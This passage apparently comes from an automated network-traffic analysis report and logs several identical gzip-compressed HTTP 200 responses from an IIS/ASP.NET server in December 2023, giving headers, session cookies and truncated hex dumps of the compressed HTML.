ab 9f ce e4 75 1a 12 ff 8f fe 79 5c 16 cb b7 69 9d 97 9f 7d 54 d0 cb 44 d8 3a 3f ff ec a3 bb e7 19 cd 4d b5 1c d3 3f 1f a5 2d 11 f6 b3 8f 8b 45 76 91 df 7d b7 4d 1f 2d 3f 66 38 fe db 44 ca 32 a7 61 ae a7 73 6e f1 51 da 14 3f c8 9b cf 3e ba ff e0 dd fd 07 16 ae 34 43 83 6d fe 62 bc 5a 5e 80 a9 6e 05 ea d3 9d 77 9f 12 85 fb a0 f8 8b f7 02 f5 60 ef dd 83 bd 18 28 fe e2 fd 40 7d fa ee c1 a7 51 50 f8 e2 bd 40 ed ee ee bf a3 ff c7 80 d1 c7 f8 ea fd c0 ed ed bc a3 ff 47 c1 c9 57 ef 07 6e 9f 50 d8 8f 63 27 5f bd 1f b8 fb 7b ef e8 ff 51 70 f2 d5 fb 81 3b a0 11 1d c4 07 2b 5f c5 c0 e1 7b 65 f0 8f 84 c1 d1 c8 c2 7c 48 78 3c f4 50 5c ce ea aa 98 29 54 f9 f2 fd a1 de db 7b 77 cf c1 54 49 db Data Ascii: `I%&/m{JJt`$@iG#)*eVe]f@{{;N'?\fdlJ!?~|?"~7t.#?2[^|Q?<u{}Qz}g]il%5*fY~YLm#xkw] ph^miz@jajgOe_<>;{4}SFs/:k{e]|:Pz2kTox4zynYLbk;~EjYfuy\i}TD:?M?-Ev}M-?f8
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKCache-Control: privateContent-Type: text/html; charset=utf-8Content-Encoding: gzipVary: Accept-EncodingServer: Microsoft-IIS/8.5X-AspNetMvc-Version: 5.2X-AspNet-Version: 4.0.30319X-Powered-By: ASP.NETDate: Sat, 02 Dec 2023 01:09:28 GMTContent-Length: 6425Data Raw: 1f 8b 08 00 00 00 00 00 04 00 ed bd 07 60 1c 49 96 25 26 2f 6d ca 7b 7f 4a f5 4a d7 e0 74 a1 08 80 60 13 24 d8 90 40 10 ec c1 88 cd e6 92 ec 1d 69 47 23 29 ab 2a 81 ca 65 56 65 5d 66 16 40 cc ed 9d bc f7 de 7b ef bd f7 de 7b ef bd f7 ba 3b 9d 4e 27 f7 df ff 3f 5c 66 64 01 6c f6 ce 4a da c9 9e 21 80 aa c8 1f 3f 7e 7c 1f 3f 22 7e e3 e4 f1 ef fa f4 cb 93 37 bf cf cb d3 74 de 2e ca 23 fa 00 3f d3 32 5b 5e 7c f6 51 be fc 88 3f c9 b3 19 fd fc b1 c7 8b bc cd d2 e9 3c ab 9b bc fd ec a3 75 7b be 7d f0 51 7a d7 7d b5 cc 16 f9 67 1f 5d 16 f9 d5 aa aa db 8f d2 69 b5 6c f3 25 35 bd 2a 66 ed fc b3 59 7e 59 4c f3 6d fe 23 78 cf b6 6b f3 77 ed 5d 20 70 68 bb d1 5e e6 6d bb da ce 7f d1 ba b8 fc ec a3 13 69 be fd e6 7a 95 0b 1c 40 6a 8b b6 cc 8f 1e df 95 9f f8 84 61 af ea 6a 95 d7 ed f5 67 1f 9d 4f 1e 65 ab d5 ef 5f cc 3c c4 3e dd ff f4 e1 c3 fb fb 3b 07 07 7b f7 f6 ef ed 0a 34 7d 53 46 73 91 2f f3 3a 6b ab da 7b eb 65 5d 9d 7c f1 3a fd c9 bd f1 8e bc e1 bf 50 e7 ab f2 7a bb ad bc f6 f3 e2 32 6b b3 f2 f7 9c 54 6f ab d9 78 be ee bf 34 ad d6 cb b6 be f6 de f9 f6 7a 79 91 e1 93 6e d3 59 de 4c eb 62 d5 16 d5 d2 6b fe 04 a0 d3 df eb 1f fd 3b 7e d0 fc a3 7f f5 45 fa ed 6a 59 66 ab 9f ce e4 75 1a 12 ff 8f fe 79 5c 16 cb b7 69 9d 97 9f 7d 54 d0 cb 44 d8 3a 3f ff ec a3 bb e7 19 cd 4d b5 1c d3 3f 1f a5 2d 11 f6 b3 8f 8b 45 76 91 df 7d b7 4d 1f 2d 3f 66 38 fe db 44 ca 32 a7 61 ae a7 73 6e f1 51 da 14 3f c8 9b cf 3e ba ff e0 dd fd 07 16 ae 34 43 83 6d fe 62 bc 5a 5e 80 a9 6e 05 ea d3 9d 77 9f 12 85 fb a0 f8 8b f7 02 f5 60 ef dd 83 bd 18 28 fe e2 fd 40 7d fa ee c1 a7 51 50 f8 e2 bd 40 ed ee ee bf a3 ff c7 80 d1 c7 f8 ea fd c0 ed ed bc a3 ff 47 c1 c9 57 ef 07 6e 9f 50 d8 8f 63 27 5f bd 1f b8 fb 7b ef e8 ff 51 70 f2 d5 fb 81 3b a0 11 1d c4 07 2b 5f c5 c0 e1 7b 65 f0 8f 84 c1 d1 c8 c2 7c 48 78 3c f4 50 5c ce ea aa 98 29 54 f9 f2 fd a1 de db 7b 77 cf c1 54 49 db e6 4f df 1f d8 c3 4f df 3d 74 dc 67 80 f1 a7 ef 0f 6c f7 d3 77 bb 7d 60 fc 69 0c d8 22 5b 16 e7 79 43 9a 5d df 30 1f 8c 7f ba a1 6e b8 b5 a7 a9 16 0d e6 a4 98 66 d0 55 db 6f 8a 32 3f a9 ca 40 91 fe f8 39 3f b7 78 f3 0c b8 7b 6f de 5d 34 3a 2b 5d 4e f4 c0 b4 f3 7c 91 6f 4f 87 3b 45 7b d1 a6 69 53 4f 09 ea 6b fe a3 b9 bb a8 66 79 bd 2c 7e 50 ff 1e 97 9f 15 cb 93 9f 5c 9f 3e cb 3f fd ce fe 4f ec 3c 38 de 39 9e be 6a 26 df 29 a6 bf ff 57 a7 f7 bf b8 5a bd fa e2 c5 e7 d3 2f db b7 0f f7 df 9c ee 7e 44 06 48 00 2a 74 26 9e 52 4b ed d6 5d 46 ab b9 3b c9 9a fc ee b4 69 a8 8b df e7 fc f3 9d 7a 72 f2 13 eb 5f f4 ec 5e fd a4 99 bc 5d 4e 3e bd fc bd 0e 3e fd c1 f6 bb d9 2f 9a bf fa c1 ea dd f5 cb ea 41 f5 53 a7 b3 8a 6c 14 cf 45 d3 5e 97 79 33 cf f3 f6 23 a8 e6 6e 5f 62 a2 6c 97 93 aa 6a 9b b6 ce 56 f7 b4 c7 f2 a7 7e 9f af 5e e5 5f 7e fb 7
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKCache-Control: privateContent-Type: text/html; charset=utf-8Content-Encoding: gzipVary: Accept-EncodingServer: Microsoft-IIS/8.5X-AspNetMvc-Version: 5.2X-AspNet-Version: 4.0.30319X-Powered-By: ASP.NETDate: Sat, 02 Dec 2023 01:09:28 GMTContent-Length: 6425Data Raw: 1f 8b 08 00 00 00 00 00 04 00 ed bd 07 60 1c 49 96 25 26 2f 6d ca 7b 7f 4a f5 4a d7 e0 74 a1 08 80 60 13 24 d8 90 40 10 ec c1 88 cd e6 92 ec 1d 69 47 23 29 ab 2a 81 ca 65 56 65 5d 66 16 40 cc ed 9d bc f7 de 7b ef bd f7 de 7b ef bd f7 ba 3b 9d 4e 27 f7 df ff 3f 5c 66 64 01 6c f6 ce 4a da c9 9e 21 80 aa c8 1f 3f 7e 7c 1f 3f 22 7e e3 e4 f1 ef fa f4 cb 93 37 bf cf cb d3 74 de 2e ca 23 fa 00 3f d3 32 5b 5e 7c f6 51 be fc 88 3f c9 b3 19 fd fc b1 c7 8b bc cd d2 e9 3c ab 9b bc fd ec a3 75 7b be 7d f0 51 7a d7 7d b5 cc 16 f9 67 1f 5d 16 f9 d5 aa aa db 8f d2 69 b5 6c f3 25 35 bd 2a 66 ed fc b3 59 7e 59 4c f3 6d fe 23 78 cf b6 6b f3 77 ed 5d 20 70 68 bb d1 5e e6 6d bb da ce 7f d1 ba b8 fc ec a3 13 69 be fd e6 7a 95 0b 1c 40 6a 8b b6 cc 8f 1e df 95 9f f8 84 61 af ea 6a 95 d7 ed f5 67 1f 9d 4f 1e 65 ab d5 ef 5f cc 3c c4 3e dd ff f4 e1 c3 fb fb 3b 07 07 7b f7 f6 ef ed 0a 34 7d 53 46 73 91 2f f3 3a 6b ab da 7b eb 65 5d 9d 7c f1 3a fd c9 bd f1 8e bc e1 bf 50 e7 ab f2 7a bb ad bc f6 f3 e2 32 6b b3 f2 f7 9c 54 6f ab d9 78 be ee bf 34 ad d6 cb b6 be f6 de f9 f6 7a 79 91 e1 93 6e d3 59 de 4c eb 62 d5 16 d5 d2 6b fe 04 a0 d3 df eb 1f fd 3b 7e d0 fc a3 7f f5 45 fa ed 6a 59 66 ab 9f ce e4 75 1a 12 ff 8f fe 79 5c 16 cb b7 69 9d 97 9f 7d 54 d0 cb 44 d8 3a 3f ff ec a3 bb e7 19 cd 4d b5 1c d3 3f 1f a5 2d 11 f6 b3 8f 8b 45 76 91 df 7d b7 4d 1f 2d 3f 66 38 fe db 44 ca 32 a7 61 ae a7 73 6e f1 51 da 14 3f c8 9b cf 3e ba ff e0 dd fd 07 16 ae 34 43 83 6d fe 62 bc 5a 5e 80 a9 6e 05 ea d3 9d 77 9f 12 85 fb a0 f8 8b f7 02 f5 60 ef dd 83 bd 18 28 fe e2 fd 40 7d fa ee c1 a7 51 50 f8 e2 bd 40 ed ee ee bf a3 ff c7 80 d1 c7 f8 ea fd c0 ed ed bc a3 ff 47 c1 c9 57 ef 07 6e 9f 50 d8 8f 63 27 5f bd 1f b8 fb 7b ef e8 ff 51 70 f2 d5 fb 81 3b a0 11 1d c4 07 2b 5f c5 c0 e1 7b 65 f0 8f 84 c1 d1 c8 c2 7c 48 78 3c f4 50 5c ce ea aa 98 29 54 f9 f2 fd a1 de db 7b 77 cf c1 54 49 db e6 4f df 1f d8 c3 4f df 3d 74 dc 67 80 f1 a7 ef 0f 6c f7 d3 77 bb 7d 60 fc 69 0c d8 22 5b 16 e7 79 43 9a 5d df 30 1f 8c 7f ba a1 6e b8 b5 a7 a9 16 0d e6 a4 98 66 d0 55 db 6f 8a 32 3f a9 ca 40 91 fe f8 39 3f b7 78 f3 0c b8 7b 6f de 5d 34 3a 2b 5d 4e f4 c0 b4 f3 7c 91 6f 4f 87 3b 45 7b d1 a6 69 53 4f 09 ea 6b fe a3 b9 bb a8 66 79 bd 2c 7e 50 ff 1e 97 9f 15 cb 93 9f 5c 9f 3e cb 3f fd ce fe 4f ec 3c 38 de 39 9e be 6a 26 df 29 a6 bf ff 57 a7 f7 bf b8 5a bd fa e2 c5 e7 d3 2f db b7 0f f7 df 9c ee 7e 44 06 48 00 2a 74 26 9e 52 4b ed d6 5d 46 ab b9 3b c9 9a fc ee b4 69 a8 8b df e7 fc f3 9d 7a 72 f2 13 eb 5f f4 ec 5e fd a4 99 bc 5d 4e 3e bd fc bd 0e 3e fd c1 f6 bb d9 2f 9a bf fa c1 ea dd f5 cb ea 41 f5 53 a7 b3 8a 6c 14 cf 45 d3 5e 97 79 33 cf f3 f6 23 a8 e6 6e 5f 62 a2 6c 97 93 aa 6a 9b b6 ce 56 f7 b4 c7 f2 a7 7e 9f af 5e e5 5f 7e fb 7
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKCache-Control: privateContent-Type: text/html; charset=utf-8Content-Encoding: gzipVary: Accept-EncodingServer: Microsoft-IIS/8.5Set-Cookie: ASP.NET_SessionId=nb0jx10kifal0loe5mtgtkzf; path=/; HttpOnly; SameSite=LaxX-AspNetMvc-Version: 5.2X-AspNet-Version: 4.0.30319X-Powered-By: ASP.NETDate: Sat, 02 Dec 2023 01:09:29 GMTContent-Length: 6425Data Raw: 1f 8b 08 00 00 00 00 00 04 00 ed bd 07 60 1c 49 96 25 26 2f 6d ca 7b 7f 4a f5 4a d7 e0 74 a1 08 80 60 13 24 d8 90 40 10 ec c1 88 cd e6 92 ec 1d 69 47 23 29 ab 2a 81 ca 65 56 65 5d 66 16 40 cc ed 9d bc f7 de 7b ef bd f7 de 7b ef bd f7 ba 3b 9d 4e 27 f7 df ff 3f 5c 66 64 01 6c f6 ce 4a da c9 9e 21 80 aa c8 1f 3f 7e 7c 1f 3f 22 7e e3 e4 f1 ef fa f4 cb 93 37 bf cf cb d3 74 de 2e ca 23 fa 00 3f d3 32 5b 5e 7c f6 51 be fc 88 3f c9 b3 19 fd fc b1 c7 8b bc cd d2 e9 3c ab 9b bc fd ec a3 75 7b be 7d f0 51 7a d7 7d b5 cc 16 f9 67 1f 5d 16 f9 d5 aa aa db 8f d2 69 b5 6c f3 25 35 bd 2a 66 ed fc b3 59 7e 59 4c f3 6d fe 23 78 cf b6 6b f3 77 ed 5d 20 70 68 bb d1 5e e6 6d bb da ce 7f d1 ba b8 fc ec a3 13 69 be fd e6 7a 95 0b 1c 40 6a 8b b6 cc 8f 1e df 95 9f f8 84 61 af ea 6a 95 d7 ed f5 67 1f 9d 4f 1e 65 ab d5 ef 5f cc 3c c4 3e dd ff f4 e1 c3 fb fb 3b 07 07 7b f7 f6 ef ed 0a 34 7d 53 46 73 91 2f f3 3a 6b ab da 7b eb 65 5d 9d 7c f1 3a fd c9 bd f1 8e bc e1 bf 50 e7 ab f2 7a bb ad bc f6 f3 e2 32 6b b3 f2 f7 9c 54 6f ab d9 78 be ee bf 34 ad d6 cb b6 be f6 de f9 f6 7a 79 91 e1 93 6e d3 59 de 4c eb 62 d5 16 d5 d2 6b fe 04 a0 d3 df eb 1f fd 3b 7e d0 fc a3 7f f5 45 fa ed 6a 59 66 ab 9f ce e4 75 1a 12 ff 8f fe 79 5c 16 cb b7 69 9d 97 9f 7d 54 d0 cb 44 d8 3a 3f ff ec a3 bb e7 19 cd 4d b5 1c d3 3f 1f a5 2d 11 f6 b3 8f 8b 45 76 91 df 7d b7 4d 1f 2d 3f 66 38 fe db 44 ca 32 a7 61 ae a7 73 6e f1 51 da 14 3f c8 9b cf 3e ba ff e0 dd fd 07 16 ae 34 43 83 6d fe 62 bc 5a 5e 80 a9 6e 05 ea d3 9d 77 9f 12 85 fb a0 f8 8b f7 02 f5 60 ef dd 83 bd 18 28 fe e2 fd 40 7d fa ee c1 a7 51 50 f8 e2 bd 40 ed ee ee bf a3 ff c7 80 d1 c7 f8 ea fd c0 ed ed bc a3 ff 47 c1 c9 57 ef 07 6e 9f 50 d8 8f 63 27 5f bd 1f b8 fb 7b ef e8 ff 51 70 f2 d5 fb 81 3b a0 11 1d c4 07 2b 5f c5 c0 e1 7b 65 f0 8f 84 c1 d1 c8 c2 7c 48 78 3c f4 50 5c ce ea aa 98 29 54 f9 f2 fd a1 de db 7b 77 cf c1 54 49 db e6 4f df 1f d8 c3 4f df 3d 74 dc 67 80 f1 a7 ef 0f 6c f7 d3 77 bb 7d 60 fc 69 0c d8 22 5b 16 e7 79 43 9a 5d df 30 1f 8c 7f ba a1 6e b8 b5 a7 a9 16 0d e6 a4 98 66 d0 55 db 6f 8a 32 3f a9 ca 40 91 fe f8 39 3f b7 78 f3 0c b8 7b 6f de 5d 34 3a 2b 5d 4e f4 c0 b4 f3 7c 91 6f 4f 87 3b 45 7b d1 a6 69 53 4f 09 ea 6b fe a3 b9 bb a8 66 79 bd 2c 7e 50 ff 1e 97 9f 15 cb 93 9f 5c 9f 3e cb 3f fd ce fe 4f ec 3c 38 de 39 9e be 6a 26 df 29 a6 bf ff 57 a7 f7 bf b8 5a bd fa e2 c5 e7 d3 2f db b7 0f f7 df 9c ee 7e 44 06 48 00 2a 74 26 9e 52 4b ed d6 5d 46 ab b9 3b c9 9a fc ee b4 69 a8 8b df e7 fc f3 9d 7a 72 f2 13 eb 5f f4 ec 5e fd a4 99 bc 5d 4e 3e bd fc bd 0e 3e fd c1 f6 bb d9 2f 9a bf fa c1 ea dd f5 cb ea 41 f5 53 a7 b3 8a 6c 14 cf 45 d3 5e 97 79 33 cf f3 f6
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKCache-Control: privateContent-Type: text/html; charset=utf-8Content-Encoding: gzipVary: Accept-EncodingServer: Microsoft-IIS/8.5Set-Cookie: ASP.NET_SessionId=odoh50iolpgpw2ifmkzbamho; path=/; HttpOnly; SameSite=LaxX-AspNetMvc-Version: 5.2X-AspNet-Version: 4.0.30319X-Powered-By: ASP.NETDate: Sat, 02 Dec 2023 01:09:29 GMTContent-Length: 6425Data Raw: 1f 8b 08 00 00 00 00 00 04 00 ed bd 07 60 1c 49 96 25 26 2f 6d ca 7b 7f 4a f5 4a d7 e0 74 a1 08 80 60 13 24 d8 90 40 10 ec c1 88 cd e6 92 ec 1d 69 47 23 29 ab 2a 81 ca 65 56 65 5d 66 16 40 cc ed 9d bc f7 de 7b ef bd f7 de 7b ef bd f7 ba 3b 9d 4e 27 f7 df ff 3f 5c 66 64 01 6c f6 ce 4a da c9 9e 21 80 aa c8 1f 3f 7e 7c 1f 3f 22 7e e3 e4 f1 ef fa f4 cb 93 37 bf cf cb d3 74 de 2e ca 23 fa 00 3f d3 32 5b 5e 7c f6 51 be fc 88 3f c9 b3 19 fd fc b1 c7 8b bc cd d2 e9 3c ab 9b bc fd ec a3 75 7b be 7d f0 51 7a d7 7d b5 cc 16 f9 67 1f 5d 16 f9 d5 aa aa db 8f d2 69 b5 6c f3 25 35 bd 2a 66 ed fc b3 59 7e 59 4c f3 6d fe 23 78 cf b6 6b f3 77 ed 5d 20 70 68 bb d1 5e e6 6d bb da ce 7f d1 ba b8 fc ec a3 13 69 be fd e6 7a 95 0b 1c 40 6a 8b b6 cc 8f 1e df 95 9f f8 84 61 af ea 6a 95 d7 ed f5 67 1f 9d 4f 1e 65 ab d5 ef 5f cc 3c c4 3e dd ff f4 e1 c3 fb fb 3b 07 07 7b f7 f6 ef ed 0a 34 7d 53 46 73 91 2f f3 3a 6b ab da 7b eb 65 5d 9d 7c f1 3a fd c9 bd f1 8e bc e1 bf 50 e7 ab f2 7a bb ad bc f6 f3 e2 32 6b b3 f2 f7 9c 54 6f ab d9 78 be ee bf 34 ad d6 cb b6 be f6 de f9 f6 7a 79 91 e1 93 6e d3 59 de 4c eb 62 d5 16 d5 d2 6b fe 04 a0 d3 df eb 1f fd 3b 7e d0 fc a3 7f f5 45 fa ed 6a 59 66 ab 9f ce e4 75 1a 12 ff 8f fe 79 5c 16 cb b7 69 9d 97 9f 7d 54 d0 cb 44 d8 3a 3f ff ec a3 bb e7 19 cd 4d b5 1c d3 3f 1f a5 2d 11 f6 b3 8f 8b 45 76 91 df 7d b7 4d 1f 2d 3f 66 38 fe db 44 ca 32 a7 61 ae a7 73 6e f1 51 da 14 3f c8 9b cf 3e ba ff e0 dd fd 07 16 ae 34 43 83 6d fe 62 bc 5a 5e 80 a9 6e 05 ea d3 9d 77 9f 12 85 fb a0 f8 8b f7 02 f5 60 ef dd 83 bd 18 28 fe e2 fd 40 7d fa ee c1 a7 51 50 f8 e2 bd 40 ed ee ee bf a3 ff c7 80 d1 c7 f8 ea fd c0 ed ed bc a3 ff 47 c1 c9 57 ef 07 6e 9f 50 d8 8f 63 27 5f bd 1f b8 fb 7b ef e8 ff 51 70 f2 d5 fb 81 3b a0 11 1d c4 07 2b 5f c5 c0 e1 7b 65 f0 8f 84 c1 d1 c8 c2 7c 48 78 3c f4 50 5c ce ea aa 98 29 54 f9 f2 fd a1 de db 7b 77 cf c1 54 49 db e6 4f df 1f d8 c3 4f df 3d 74 dc 67 80 f1 a7 ef 0f 6c f7 d3 77 bb 7d 60 fc 69 0c d8 22 5b 16 e7 79 43 9a 5d df 30 1f 8c 7f ba a1 6e b8 b5 a7 a9 16 0d e6 a4 98 66 d0 55 db 6f 8a 32 3f a9 ca 40 91 fe f8 39 3f b7 78 f3 0c b8 7b 6f de 5d 34 3a 2b 5d 4e f4 c0 b4 f3 7c 91 6f 4f 87 3b 45 7b d1 a6 69 53 4f 09 ea 6b fe a3 b9 bb a8 66 79 bd 2c 7e 50 ff 1e 97 9f 15 cb 93 9f 5c 9f 3e cb 3f fd ce fe 4f ec 3c 38 de 39 9e be 6a 26 df 29 a6 bf ff 57 a7 f7 bf b8 5a bd fa e2 c5 e7 d3 2f db b7 0f f7 df 9c ee 7e 44 06 48 00 2a 74 26 9e 52 4b ed d6 5d 46 ab b9 3b c9 9a fc ee b4 69 a8 8b df e7 fc f3 9d 7a 72 f2 13 eb 5f f4 ec 5e fd a4 99 bc 5d 4e 3e bd fc bd 0e 3e fd c1 f6 bb d9 2f 9a bf fa c1 ea dd f5 cb ea 41 f5 53 a7 b3 8a 6c 14 cf 45 d3 5e 97 79 33 cf f3 f6
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKCache-Control: privateContent-Type: text/html; charset=utf-8Content-Encoding: gzipVary: Accept-EncodingServer: Microsoft-IIS/8.5Set-Cookie: ASP.NET_SessionId=oapnk3hjjknady5gfqszwsoq; path=/; HttpOnly; SameSite=LaxX-AspNetMvc-Version: 5.2X-AspNet-Version: 4.0.30319X-Powered-By: ASP.NETDate: Sat, 02 Dec 2023 01:09:31 GMTContent-Length: 6425Data Raw: 1f 8b 08 00 00 00 00 00 04 00 ed bd 07 60 1c 49 96 25 26 2f 6d ca 7b 7f 4a f5 4a d7 e0 74 a1 08 80 60 13 24 d8 90 40 10 ec c1 88 cd e6 92 ec 1d 69 47 23 29 ab 2a 81 ca 65 56 65 5d 66 16 40 cc ed 9d bc f7 de 7b ef bd f7 de 7b ef bd f7 ba 3b 9d 4e 27 f7 df ff 3f 5c 66 64 01 6c f6 ce 4a da c9 9e 21 80 aa c8 1f 3f 7e 7c 1f 3f 22 7e e3 e4 f1 ef fa f4 cb 93 37 bf cf cb d3 74 de 2e ca 23 fa 00 3f d3 32 5b 5e 7c f6 51 be fc 88 3f c9 b3 19 fd fc b1 c7 8b bc cd d2 e9 3c ab 9b bc fd ec a3 75 7b be 7d f0 51 7a d7 7d b5 cc 16 f9 67 1f 5d 16 f9 d5 aa aa db 8f d2 69 b5 6c f3 25 35 bd 2a 66 ed fc b3 59 7e 59 4c f3 6d fe 23 78 cf b6 6b f3 77 ed 5d 20 70 68 bb d1 5e e6 6d bb da ce 7f d1 ba b8 fc ec a3 13 69 be fd e6 7a 95 0b 1c 40 6a 8b b6 cc 8f 1e df 95 9f f8 84 61 af ea 6a 95 d7 ed f5 67 1f 9d 4f 1e 65 ab d5 ef 5f cc 3c c4 3e dd ff f4 e1 c3 fb fb 3b 07 07 7b f7 f6 ef ed 0a 34 7d 53 46 73 91 2f f3 3a 6b ab da 7b eb 65 5d 9d 7c f1 3a fd c9 bd f1 8e bc e1 bf 50 e7 ab f2 7a bb ad bc f6 f3 e2 32 6b b3 f2 f7 9c 54 6f ab d9 78 be ee bf 34 ad d6 cb b6 be f6 de f9 f6 7a 79 91 e1 93 6e d3 59 de 4c eb 62 d5 16 d5 d2 6b fe 04 a0 d3 df eb 1f fd 3b 7e d0 fc a3 7f f5 45 fa ed 6a 59 66 ab 9f ce e4 75 1a 12 ff 8f fe 79 5c 16 cb b7 69 9d 97 9f 7d 54 d0 cb 44 d8 3a 3f ff ec a3 bb e7 19 cd 4d b5 1c d3 3f 1f a5 2d 11 f6 b3 8f 8b 45 76 91 df 7d b7 4d 1f 2d 3f 66 38 fe db 44 ca 32 a7 61 ae a7 73 6e f1 51 da 14 3f c8 9b cf 3e ba ff e0 dd fd 07 16 ae 34 43 83 6d fe 62 bc 5a 5e 80 a9 6e 05 ea d3 9d 77 9f 12 85 fb a0 f8 8b f7 02 f5 60 ef dd 83 bd 18 28 fe e2 fd 40 7d fa ee c1 a7 51 50 f8 e2 bd 40 ed ee ee bf a3 ff c7 80 d1 c7 f8 ea fd c0 ed ed bc a3 ff 47 c1 c9 57 ef 07 6e 9f 50 d8 8f 63 27 5f bd 1f b8 fb 7b ef e8 ff 51 70 f2 d5 fb 81 3b a0 11 1d c4 07 2b 5f c5 c0 e1 7b 65 f0 8f 84 c1 d1 c8 c2 7c 48 78 3c f4 50 5c ce ea aa 98 29 54 f9 f2 fd a1 de db 7b 77 cf c1 54 49 db e6 4f df 1f d8 c3 4f df 3d 74 dc 67 80 f1 a7 ef 0f 6c f7 d3 77 bb 7d 60 fc 69 0c d8 22 5b 16 e7 79 43 9a 5d df 30 1f 8c 7f ba a1 6e b8 b5 a7 a9 16 0d e6 a4 98 66 d0 55 db 6f 8a 32 3f a9 ca 40 91 fe f8 39 3f b7 78 f3 0c b8 7b 6f de 5d 34 3a 2b 5d 4e f4 c0 b4 f3 7c 91 6f 4f 87 3b 45 7b d1 a6 69 53 4f 09 ea 6b fe a3 b9 bb a8 66 79 bd 2c 7e 50 ff 1e 97 9f 15 cb 93 9f 5c 9f 3e cb 3f fd ce fe 4f ec 3c 38 de 39 9e be 6a 26 df 29 a6 bf ff 57 a7 f7 bf b8 5a bd fa e2 c5 e7 d3 2f db b7 0f f7 df 9c ee 7e 44 06 48 00 2a 74 26 9e 52 4b ed d6 5d 46 ab b9 3b c9 9a fc ee b4 69 a8 8b df e7 fc f3 9d 7a 72 f2 13 eb 5f f4 ec 5e fd a4 99 bc 5d 4e 3e bd fc bd 0e 3e fd c1 f6 bb d9 2f 9a bf fa c1 ea dd f5 cb ea 41 f5 53 a7 b3 8a 6c 14 cf 45 d3 5e 97 79 33 cf f3 f6
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKCache-Control: privateContent-Type: text/html; charset=utf-8Content-Encoding: gzipVary: Accept-EncodingServer: Microsoft-IIS/8.5Set-Cookie: ASP.NET_SessionId=z5yl5z5srju4rf2wkb4qhiw2; path=/; HttpOnly; SameSite=LaxX-AspNetMvc-Version: 5.2X-AspNet-Version: 4.0.30319X-Powered-By: ASP.NETDate: Sat, 02 Dec 2023 01:09:31 GMTContent-Length: 6425Data Raw: 1f 8b 08 00 00 00 00 00 04 00 ed bd 07 60 1c 49 96 25 26 2f 6d ca 7b 7f 4a f5 4a d7 e0 74 a1 08 80 60 13 24 d8 90 40 10 ec c1 88 cd e6 92 ec 1d 69 47 23 29 ab 2a 81 ca 65 56 65 5d 66 16 40 cc ed 9d bc f7 de 7b ef bd f7 de 7b ef bd f7 ba 3b 9d 4e 27 f7 df ff 3f 5c 66 64 01 6c f6 ce 4a da c9 9e 21 80 aa c8 1f 3f 7e 7c 1f 3f 22 7e e3 e4 f1 ef fa f4 cb 93 37 bf cf cb d3 74 de 2e ca 23 fa 00 3f d3 32 5b 5e 7c f6 51 be fc 88 3f c9 b3 19 fd fc b1 c7 8b bc cd d2 e9 3c ab 9b bc fd ec a3 75 7b be 7d f0 51 7a d7 7d b5 cc 16 f9 67 1f 5d 16 f9 d5 aa aa db 8f d2 69 b5 6c f3 25 35 bd 2a 66 ed fc b3 59 7e 59 4c f3 6d fe 23 78 cf b6 6b f3 77 ed 5d 20 70 68 bb d1 5e e6 6d bb da ce 7f d1 ba b8 fc ec a3 13 69 be fd e6 7a 95 0b 1c 40 6a 8b b6 cc 8f 1e df 95 9f f8 84 61 af ea 6a 95 d7 ed f5 67 1f 9d 4f 1e 65 ab d5 ef 5f cc 3c c4 3e dd ff f4 e1 c3 fb fb 3b 07 07 7b f7 f6 ef ed 0a 34 7d 53 46 73 91 2f f3 3a 6b ab da 7b eb 65 5d 9d 7c f1 3a fd c9 bd f1 8e bc e1 bf 50 e7 ab f2 7a bb ad bc f6 f3 e2 32 6b b3 f2 f7 9c 54 6f ab d9 78 be ee bf 34 ad d6 cb b6 be f6 de f9 f6 7a 79 91 e1 93 6e d3 59 de 4c eb 62 d5 16 d5 d2 6b fe 04 a0 d3 df eb 1f fd 3b 7e d0 fc a3 7f f5 45 fa ed 6a 59 66 ab 9f ce e4 75 1a 12 ff 8f fe 79 5c 16 cb b7 69 9d 97 9f 7d 54 d0 cb 44 d8 3a 3f ff ec a3 bb e7 19 cd 4d b5 1c d3 3f 1f a5 2d 11 f6 b3 8f 8b 45 76 91 df 7d b7 4d 1f 2d 3f 66 38 fe db 44 ca 32 a7 61 ae a7 73 6e f1 51 da 14 3f c8 9b cf 3e ba ff e0 dd fd 07 16 ae 34 43 83 6d fe 62 bc 5a 5e 80 a9 6e 05 ea d3 9d 77 9f 12 85 fb a0 f8 8b f7 02 f5 60 ef dd 83 bd 18 28 fe e2 fd 40 7d fa ee c1 a7 51 50 f8 e2 bd 40 ed ee ee bf a3 ff c7 80 d1 c7 f8 ea fd c0 ed ed bc a3 ff 47 c1 c9 57 ef 07 6e 9f 50 d8 8f 63 27 5f bd 1f b8 fb 7b ef e8 ff 51 70 f2 d5 fb 81 3b a0 11 1d c4 07 2b 5f c5 c0 e1 7b 65 f0 8f 84 c1 d1 c8 c2 7c 48 78 3c f4 50 5c ce ea aa 98 29 54 f9 f2 fd a1 de db 7b 77 cf c1 54 49 db e6 4f df 1f d8 c3 4f df 3d 74 dc 67 80 f1 a7 ef 0f 6c f7 d3 77 bb 7d 60 fc 69 0c d8 22 5b 16 e7 79 43 9a 5d df 30 1f 8c 7f ba a1 6e b8 b5 a7 a9 16 0d e6 a4 98 66 d0 55 db 6f 8a 32 3f a9 ca 40 91 fe f8 39 3f b7 78 f3 0c b8 7b 6f de 5d 34 3a 2b 5d 4e f4 c0 b4 f3 7c 91 6f 4f 87 3b 45 7b d1 a6 69 53 4f 09 ea 6b fe a3 b9 bb a8 66 79 bd 2c 7e 50 ff 1e 97 9f 15 cb 93 9f 5c 9f 3e cb 3f fd ce fe 4f ec 3c 38 de 39 9e be 6a 26 df 29 a6 bf ff 57 a7 f7 bf b8 5a bd fa e2 c5 e7 d3 2f db b7 0f f7 df 9c ee 7e 44 06 48 00 2a 74 26 9e 52 4b ed d6 5d 46 ab b9 3b c9 9a fc ee b4 69 a8 8b df e7 fc f3 9d 7a 72 f2 13 eb 5f f4 ec 5e fd a4 99 bc 5d 4e 3e bd fc bd 0e 3e fd c1 f6 bb d9 2f 9a bf fa c1 ea dd f5 cb ea 41 f5 53 a7 b3 8a 6c 14 cf 45 d3 5e 97 79 33 cf f3 f6
